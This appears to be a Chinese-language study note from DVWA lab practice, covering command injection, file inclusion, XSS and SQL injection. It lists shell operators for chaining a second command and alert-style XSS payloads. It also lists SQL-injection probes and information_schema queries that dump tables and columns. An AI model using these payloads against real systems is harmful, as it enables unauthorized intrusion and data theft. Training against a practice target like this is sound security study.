命令执行
dvwa测试过程中用到的命令执行参数:
&&
command1 && command2
先执行command1,若command1为真后在执行command2
&
command1 & command2
command1和command2同时执行,不管command1是否执行成功
||
command1 || command2
先执行command1,若command为假在执行command2
|
command1 | command2
只执行command2
;
command1 ; command2
先执行command1在执行command2
文件包含
总结:
1、在浏览器上修改所包含的文件名
2、bp抓包修改文件的mime和文件名
3、在文件或图片中写入木马
dvwa中文件包含high中用到此语法:
file:///文件路径
file协议:本地文件传输协议 主要用于访问本地计算机中的文件。
例如:file:///D:\phpstudy_pro\WWW\DVWA-master\php.ini
XSS
xss跨站脚本攻击,攻击者通过往web页面里插入恶意的script代码,当用户浏览页面时,嵌入web里的script代码就会被执行,从而达到攻击的目的。xss攻击是针对用户层面
xss dom
<script>alert('1')</script>
<img src=1 onerror=alert('2')>
xss Reflected
某件事情你干不了,但是你可以想办法把要干的事情告诉别人,让别人把这件事情干了并把结果反馈给你。
带入到反射型xss中,我想对服务器做一件不好的事情,但是我没有服务器的操作权限,我可以提交代码给服务器,服务器会自己执行代码并把结果返回到浏览器上,如此便能得到我想要的结果
xss stored
也叫持久型XSS,特征是攻击代码会被存储在数据库等存储介质中,因此功效持久。
sql注入
判断类型,是字符型注入还是数值型注入
测试语句大概如下:
1
1’
1’ or 1=1
1’ and 1=1
1’ and 1=2
1’ and ‘1’='1
查看基本信息
select version(),database()
查看数据库中的表
select group_concat(table_name) from information_schema.tables where table_schema=database()
查看表中的字段
select group_concat(column_name) from information_schema.columns where table_name=‘—’
查看表的内容
select group_concat(字段1),group_concat(字段2) from 表名
ps:勤更换思路啊,勤F12啊啊,啊,啊